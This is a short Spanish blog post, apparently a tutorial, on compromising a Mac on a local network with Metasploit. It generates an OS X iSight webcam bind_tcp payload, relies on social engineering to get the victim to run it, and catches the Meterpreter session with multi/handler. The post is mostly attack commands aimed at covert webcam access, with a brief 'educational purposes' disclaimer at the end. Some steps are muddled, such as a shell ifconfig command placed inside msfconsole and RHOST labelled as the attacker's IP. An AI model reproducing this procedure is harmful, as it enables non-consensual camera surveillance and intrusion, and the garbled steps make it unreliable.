Hoy veremos como conseguir una sesión meterpreter a una mac dentro de una red local.
Una de las cosas más interesantes sobre la plataforma Mac es como cámaras están incorporadas en todos los ordenadores portátiles. Este hecho no ha pasado desapercibido por los desarrolladores de Metasploit.
Vamos a ver en acción. Primero generamos un ejecutable independiente para transferir a un sistema OS X:
msfpayload osx/x86/isight/bind_tcp X > exploit <- Genera el ejecutable en el
escritorio
Ahora usaremos Ingeniería Social para que nuestra victima caiga.
Los siguientes comandos se ponen dentro de msfconsole.
msf > use multi/handler <- Queda en modo escucha
msf exploit(handler) > set PAYLOAD osx/x86/isight/bind_tcp
<- Seleccionamos el payload que vamos a usar
ifconfig wlan0 <- Establecemos la interfaz de red
set RHOST 123.168.14.34 <- Ip del atacante
exploit <- Lanzamos el exploit
Y hemos conseguido una sesión de meterpreter.
Bueno se que esto les puede sonar a "Frase de cajón "
pero recuerden que esto es solo con fines educativo.
Comentarios
Publicar un comentario